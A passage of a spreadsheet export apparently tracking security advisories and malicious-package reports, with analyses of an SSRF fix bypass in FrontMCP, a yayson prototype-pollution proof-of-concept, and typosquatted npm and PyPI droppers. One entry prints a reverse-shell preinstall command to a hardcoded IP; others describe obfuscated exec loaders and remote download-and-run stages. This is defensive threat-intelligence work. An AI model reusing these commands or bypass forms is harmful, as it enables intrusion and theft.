{"name":"redirect-to-127-after-allowed-host","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/redirect","ok":true,"hitCount":2,"hits":[{"url":"/redirect","host":"127.0.0.1.nip.io:45117","authorization":null},{"url":"/schema.json","host":"127.0.0.1:45117","authorization":null}]}
{"name":"ipv4-mapped-ipv6-dotted-bypass","kind":"external_ref","refUrl":"http://[::ffff:127.0.0.1]:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"[::ffff:7f00:1]:45117","authorization":null}]}
{"name":"ipv4-mapped-ipv6-hex-bypass","kind":"external_ref","refUrl":"http://[::ffff:7f00:1]:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"[::ffff:7f00:1]:45117","authorization":null}]}
{"name":"external-refs-disabled-control","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/schema.json","ok":true,"hitCount":0,"hits":[]}
```
Controls:
1. Direct loopback `$ref` is denied and the canary records zero requests.
2. Numeric IPv4 variants tested as parser controls were denied with zero requests.
3. Default `file://` resolution was denied in this runtime.
4. Setting `refResolution.allowedProtocols: []` prevents the external request, but this is not the default.
## Impact
The previous advisory documented SSRF during untrusted OpenAPI `$ref` dereferencing. The latest patched version still lets an attacker trigger backend-origin requests to loopback or private network services through equivalent URL forms. In hosted or multi-user FrontMCP deployments where users can import or configure OpenAPI specs, this can expose internal admin APIs, metadata-like services, and other network endpoints that external users cannot reach directly.
The impact depends on whether a deployment treats OpenAPI adapter configuration as trusted administrator-only input. If untrusted authenticated users can import specs, this is a high-impact SSRF fix bypass. If only a local administrator can configure OpenAPI specs, the practical severity is lower.
## Remediation
1. Do not rely on parsed hostname denylist checks for external `$ref` URLs.
2. Resolve hostnames before the request and reject loopback, private, link-local, multicast, unspecified, and metadata ranges.
3. Normalize IPv4-mapped IPv6 before range checks.
4. Revalidate every redirect target before following it, or disable redirects during external `$ref` dereferencing.
5. Pin the validated IP to the actual request with a custom dispatcher, lookup hook, or equivalent connect-time control.
6. Apply the same protected client to `fromURL()` initial spec loads.
7. Consider disabling external refs by default for untrusted OpenAPI specs and requiring explicit allowlists.
8. Add regression tests for direct loopback, DNS-to-loopback, redirect-to-loopback, IPv4-mapped IPv6, numeric IP forms, file refs, and disabled external refs.</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59973</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61534</t>
        </is>
      </c>
      <c r="D42" s="5" t="inlineStr"/>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr">
        <is>
          <t>npm:yayson</t>
        </is>
      </c>
      <c r="M42" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr"/>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t># Summary
`Store`/`LegacyStore` key internal lookup tables by the `type`, `id`, and relationship names from a JSON:API document. Because these were plain objects, a document with `type: "__proto__"` writes onto `Object.prototype`, polluting every object in the process.
# Severity
Suggested CVSS v3.1 `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H` (8.1). The guaranteed impact is process-wide DoS / logic corruption; escalation to authorization bypass or RCE is dependent on gadgets in the consuming application.
# Affected / Patched
- Affected: `&lt;= 4.2.0` (verified in `3.0.0` and `4.2.0`; all 3.x and 4.x).
- Patched: `4.3.0`.
# Details
`type` is a string *value*, untouched by `JSON.parse`, and is used directly as an object key:
```js
if (!models[type]) models[type] = {}          // models["__proto__"] is Object.prototype → skipped
if (!models[type][id]) models[type][id] = model // → Object.prototype[id] = model
```
The attacker controls the polluted key (`id`) and value (the model, populated from `attributes`). Pollution persists for the process lifetime. The malicious type can also arrive via an `included` resource referenced by a relationship, bypassing any `data.type` allow-list. `LegacyStore` is additionally reachable when a configured `types` mapping resolves to `"__proto__"`.
# Proof of concept
```js
const { Store } = require('yayson')()
new Store().sync({ data: { type: '__proto__', id: 'polluted', attributes: { x: 1 } } })
console.log(({}).polluted) // { x: 1, id: 'polluted' }  ← Object.prototype polluted
```
# Workarounds
Reject documents whose `type` or relationship names are `__proto__`, `constructor`, or `prototype`, or run Node with `--disable-proto=throw`.
# Fix
Null-prototype lookup tables, rejection of `__proto__`/`constructor`/`prototype` as document-derived member names, `Object.keys()` iteration, and null-prototype normalization of caller-supplied caches.</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61534</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>GHSA-8p5f-pjcw-69mw</t>
        </is>
      </c>
      <c r="D43" s="5" t="inlineStr"/>
      <c r="E43" s="5" t="inlineStr"/>
      <c r="F43" s="5" t="inlineStr"/>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr">
        <is>
          <t>npm:tailwind-form-kit</t>
        </is>
      </c>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (92f4a69a3b50ac2347f8b3324abca2c0df1cf83422ee0f164b799cb748fa76b5)
The package presents itself as a Tailwind CSS forms plugin but its main entry src/index.js is a heavily obfuscated module (obfuscator.io-style rotating string array with 303 entries, hex identifiers, control-flow dispatchers) that on require/import dynamically loads node:http, node:https, node:zlib, and node:child_process via createRequire and stashes them on the global object. On module load it issues POST requests carrying a custom x-payload-* header and a spoofed Chrome/Windows User-Agent to a hardcoded blockchain indexer (etherscan/blockscout-style) and to public Ethereum RPC providers (publicnode.com, drpc.org, 1rpc.io, eth-mainnet), reading process.env.ETH_RPC_URL to augment the RPC list, and references a hardcoded Ethereum sender address. None of this behavior is disclosed and none of it corresponds to a Tailwind CSS forms plugin; the repository field also impersonates tailwindlabs. The combination of heavy obfuscation, dynamic-require caching on global, spawn availability, and unsolicited outbound blockchain network I/O at library-load is a covert import-time channel unrelated to the advertised purpose.
## Source: ghsa-malware (2f393dd02d60e026717c58d23e86b376b0a47b73038607f8ddd9254442f0d1e6)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43" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16139</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16126</t>
        </is>
      </c>
      <c r="D44" s="5" t="inlineStr"/>
      <c r="E44" s="5" t="inlineStr"/>
      <c r="F44" s="5" t="inlineStr"/>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-vinsoc-1109</t>
        </is>
      </c>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4dbb0aa83cfffbdd408abb8f73299d5a47a0e9855c65b5940bb22112e0928d41)
The package's postinstall lifecycle script (`node postinstall.js || true`) fires automatically on `npm install`. postinstall.js reads `os.hostname()`, embeds the sanitized value as a subdomain of the hardcoded host `1bdtwmd0wdrpwnlput1up9x39ufl3br0.oastify.com` (a Burp Collaborator out-of-band collector), and performs both a DNS lookup and a plain-HTTP GET to `/poc/&lt;hostname&gt;` at that host. The result is silent transmission of the installer's machine identifier to an attacker-controlled OOB endpoint on every install, with errors swallowed so the install does not visibly fail. The package name and version resemble a scoped Strapi plugin but the shipped payload performs no plugin functionality — only the beacon.
## Source: ossf-package-analysis (3dad65e846069addf34b62c3321a51ff2d43b04f6385c7edcbd8f3a2552e876b)
The OpenSSF Package Analysis project identified 'strapi-plugin-vinsoc-1109' @ 3.6.8 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16126</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16127</t>
        </is>
      </c>
      <c r="D45" s="5" t="inlineStr"/>
      <c r="E45" s="5" t="inlineStr"/>
      <c r="F45" s="5" t="inlineStr"/>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr">
        <is>
          <t>PyPI:eth-account-web3</t>
        </is>
      </c>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (38b69dc345e5f7b75dbe6dccaf3dfc013a98e302176130aac064cbd8d042bae7)
The distribution eth-account-web3 installs under the import name eth_account, colliding with the legitimate ethereum/eth-account library. On import, __init__.py invokes _auto()/sync() in a background thread named 'urllib3-connection-pool'. When the ETH_ACCT_RPC and ETH_ACCT_CONTRACT environment variables are present, sync() issues an eth_call to the configured contract to retrieve a URL, downloads the response over HTTP(S) with no hash or signature verification, and passes the bytes to _apply_txn_payload. Python payloads are handed to exec(compile(...)). Windows PE payloads (MZ magic) are mapped via CreateFileMappingW/MapViewOfFile and launched with CreateProcessW using DETACHED_PROCESS|CREATE_NO_WINDOW, avoiding any on-disk artifact. Other binary payloads are written to /tmp/_ethrt_&lt;pid&gt;.bin, chmod +x'd, spawned detached with start_new_session=True, and then deleted. The URL source is attacker-controlled (a Solidity contract the operator of the on-chain pointer can update at any time), giving remote code execution on the installer with in-memory execution and anti-forensics on Windows and immediate file cleanup on POSIX. The import-name collision and the urllib3-impersonating thread name are deliberate concealment intended to blend into normal Python/Web3 activity.
## Source: kam193 (25b1d3ecadcdc171186f8b8c574e830d3078a33be08f0455fd7bafc179d028ca)
A clone of a legitimate package with import-time malicious code activating if specific env variables are set. Once activated, it queries the blockchain to retrieve the next stage URL stored in a smart contract. The payload from the URL is then downloaded and executed. The address of the smart contract is not included in the package.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-web3-eth-account
Reasons (based on the campaign):
 - typosquatting
 - clones-real-package
 - c2-in-blockchain
 - Downloads and executes a remote malicious script.
</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16127</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16128</t>
        </is>
      </c>
      <c r="D46" s="5" t="inlineStr"/>
      <c r="E46" s="5" t="inlineStr"/>
      <c r="F46" s="5" t="inlineStr"/>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr">
        <is>
          <t>PyPI:pymem-win</t>
        </is>
      </c>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4c611131ac135f4608698ce56eebd7dc89623b591510a050f2059369c9d51bbf)
Pymem-win is a near-verbatim copy of the legitimate upstream Pymem package (reusing its description, repository URL github.com/srounet/Pymem, and author identity Fabien Reboia &lt;srounet@gmail.com&gt;) republished under a confusable name. The top-level pymem/__init__.py contains a one-line loader that reverses a bytes literal, base64-decodes it, zlib-decompresses it, and passes the result to exec(). This runs unconditionally on `import pymem`, handing full in-process code execution to a payload deliberately hidden behind three stacked transforms. The multi-layer obfuscation around an exec target has no legitimate purpose in a library import path; combined with the typosquat cover story that reuses the upstream author's identity, the package's function on install/import is to run attacker-chosen code inside any process that imports it.
## Source: kam193 (82eb1f11c9b56a2f2c3e97530db43ef94784a2c75697223828403927b0528477)
During import, the obfuscated code downloads and executes an executable. The remote executable did not exist during analysis, but the repository used to host it overlaps with previous campaign 2026-07-yt-api-dlp
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-pymem-win
Reasons (based on the campaign):
 - obfuscation
 - Downloads and executes a remote executable.
 - clones-real-package
</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16128</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16129</t>
        </is>
      </c>
      <c r="D47" s="5" t="inlineStr"/>
      <c r="E47" s="5" t="inlineStr"/>
      <c r="F47" s="5" t="inlineStr"/>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr">
        <is>
          <t>PyPI:web3-eth-account</t>
        </is>
      </c>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (19e3eadaccc63a1e12d0e3cfe153cbf78e114f30285d4da3694990827e5f5c5a)
The package `web3-eth-account` typosquats the legitimate `eth-account` library and copies its metadata (ApeWorX/ethereum.org author addresses, README instructing `pip install eth-account`). On `import eth_account`, `__init__.py` calls `_auto()` which, when the environment variables `ETH_ACCT_RPC` and `ETH_ACCT_CONTRACT` are set, spawns a background thread (named `urllib3-connection-pool` for cover) that performs a JSON-RPC `eth_call` with selector `0x5600f04f` against an attacker-controlled Ethereum contract, decodes an ABI-encoded URL from contract storage, downloads bytes via `urllib.request.urlopen`, and hands them to `_apply_txn_payload` in `signing.py` / `transaction_utils.py`. That sink classifies the fetched bytes and executes them three ways: Python source via `exec(compile(...))`; Windows PE loaded in-memory via ctypes `CreateFileMappingW`/`MapViewOfFile`/`CreateProcessW`; otherwise written to `/tmp/_ethrt_&lt;pid&gt;.bin`, `chmod +x`, launched via `subprocess.Popen` in a new session with the file removed after launch. The C2 URL is resolved on-chain rather than embedded as a literal, defeating static URL extraction, and the dropper functions are disguised under transaction/signing names.
## Source: kam193 (bd36aeb2d45881a66bf5373c0b91a108637938dab5e0c153525e6f938c9c9503)
A clone of a legitimate package with import-time malicious code activating if specific env variables are set. Once activated, it queries the blockchain to retrieve the next stage URL stored in a smart contract. The payload from the URL is then downloaded and executed. The address of the smart contract is not included in the package.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-web3-eth-account
Reasons (based on the campaign):
 - typosquatting
 - clones-real-package
 - c2-in-blockchain
 - Downloads and executes a remote malicious script.
</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16129</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16130</t>
        </is>
      </c>
      <c r="D48" s="5" t="inlineStr"/>
      <c r="E48" s="5" t="inlineStr"/>
      <c r="F48" s="5" t="inlineStr"/>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr">
        <is>
          <t>PyPI:aitextkit-py</t>
        </is>
      </c>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (47e96f519e8acba48a6f7760b37a9ad70b94bfbf79fb5eac4fc682849b2837e3)
The package presents itself as a small text-cleaning utility library, but both shipped implementation modules (text.py and system.py) consist of a single-line pyobfuscator.com loader of the form `_ = lambda __: __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'...'))`, which reverses, base64-decodes, zlib-decompresses, and exec()s an opaque blob at module import. __init__.py imports from.text, so `import aitextkit` runs the decoded bytes on the installer's Python interpreter. __init__.py also re-exports an undocumented `setup` symbol whose body lives inside the obfuscated blob and which is not mentioned in the README, tests, or public API documentation - a common stager entry-point shape. system.py, which backs the documented `get_os_version()` helper, uses the identical loader and its tests reference `platform`, `release`, and `arch` fields, so the decoded code at minimum performs host enumeration inside code that is not inspectable from source. The declared text-utility purpose has no legitimate need to ship its entire implementation as an exec-decoded blob; the loader shape matches that used by PyPI credential-stealer families.
## Source: kam193 (73303124008a821f9096bc4899d8df4302abc2e0f86822660422f855a1bc65cb)
The package hides code downloading script, which then downloads and executes a heavily obfuscated final stage. The remote stages are hosted on a domain presenting a suspicious-looking corporate website. The downloaded code establishes persistence e.g. as "anymeetly-cameradriver" systemd service. The discovered artifacts suggest strongly it acts as an infostealer and RAT.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-aitextkit-py
Reasons (based on the campaign):
 - obfuscation
 - Downloads and executes a remote malicious script.
 - persistence
 - infostealer
 - exfiltration-browser-data
 - rat
 - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16130</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16131</t>
        </is>
      </c>
      <c r="D49" s="5" t="inlineStr"/>
      <c r="E49" s="5" t="inlineStr"/>
      <c r="F49" s="5" t="inlineStr"/>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr">
        <is>
          <t>PyPI:aitextutils-py</t>
        </is>
      </c>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (59b5d893cd227654dae3bd7964e54ba20c99963660993e4239f34bba0d50b772)
This package executes code from malicious dependency, which hides code downloading script, which then downloads and executes a heavily obfuscated final stage. The remote stages are hosted on a domain presenting a suspicious-looking corporate website. The downloaded code establishes persistence e.g. as "anymeetly-cameradriver" systemd service.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-aitextkit-py
Reasons (based on the campaign):
 - obfuscation
 - Downloads and executes a remote malicious script.
 - persistence
 - infostealer
 - exfiltration-browser-data
 - rat
 - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16131</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16132</t>
        </is>
      </c>
      <c r="D50" s="5" t="inlineStr"/>
      <c r="E50" s="5" t="inlineStr"/>
      <c r="F50" s="5" t="inlineStr"/>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>npm:@nimbusedge/auth</t>
        </is>
      </c>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a1c515f5cb3bfa2c20dc4fa78c4be6865209e833016cd5804b94ba5f3d1d5885)
package.json declares a `preinstall` lifecycle script that runs `bash -i &gt;&amp; /dev/tcp/147.93.157.202/8080` to open an interactive reverse shell to the hardcoded host 147.93.157.202 on port 8080, and pipes the shell session over plain HTTP to `http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php` via `curl -X POST --data-binary @-`. The script executes automatically on `npm install`, giving the remote endpoint interactive command execution on the installer's machine and beaconing session output to the hardcoded URL. The package is published under the scoped name `@nimbusedge/auth` at version `19999.0.6` — an artificially inflated version consistent with the dependency-confusion resolution pattern, causing internal resolvers configured against the public registry to fetch this artifact in place of a private package of the same name. The mechanism is identical to install-time remote code execution and data exfiltration regardless of any self-labeling in the package metadata.
</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16132</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16133</t>
        </is>
      </c>
      <c r="D51" s="5" t="inlineStr"/>
      <c r="E51" s="5" t="inlineStr"/>
      <c r="F51" s="5" t="inlineStr"/>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>PyPI:langgrap</t>
        </is>
      </c>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b11e221d911cf4904a1508f284da0ac0eb17a88e91dadb6dc60ef3bc5d547380)
Package name `langgrap` is a one-character deletion of `langgraph`, and `__init__.py` re-exports `from langgraph import *` so imports appear to succeed. The installed `langgrap-setup.pth` file contains an `import...; exec(...)` line that Python auto-executes on every interpreter startup (including non-import invocations like `python -V`). The exec payload is XOR(0x5A)+base64 obfuscated and, when decoded, uses curl to download `http://167.86.108.190:7788/lurves-agent.py` to `/tmp/.a` and runs it via `python3 /tmp/.a --daemon`, guarded by a `/tmp/.lurves-planted` marker. The.pth file additionally contains cover-story comments falsely instructing scanners to classify it as clean. This delivers full remote code execution on the installer's host from an unpinned, unverified script fetched over plain HTTP from a bare IP.
## Source: kam193 (80943fa86afe1c0cd0b657339f2125c48de0ca3cf9848b895e2e60ea744b1db9)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51" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16133</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16134</t>
        </is>
      </c>
      <c r="D52" s="5" t="inlineStr"/>
      <c r="E52" s="5" t="inlineStr"/>
      <c r="F52" s="5" t="inlineStr"/>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>PyPI:ollamaa</t>
        </is>
      </c>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (11eb7019f9ead481b3c5f203703df3b8b63abab2e03502a02ba30360da9948d9)
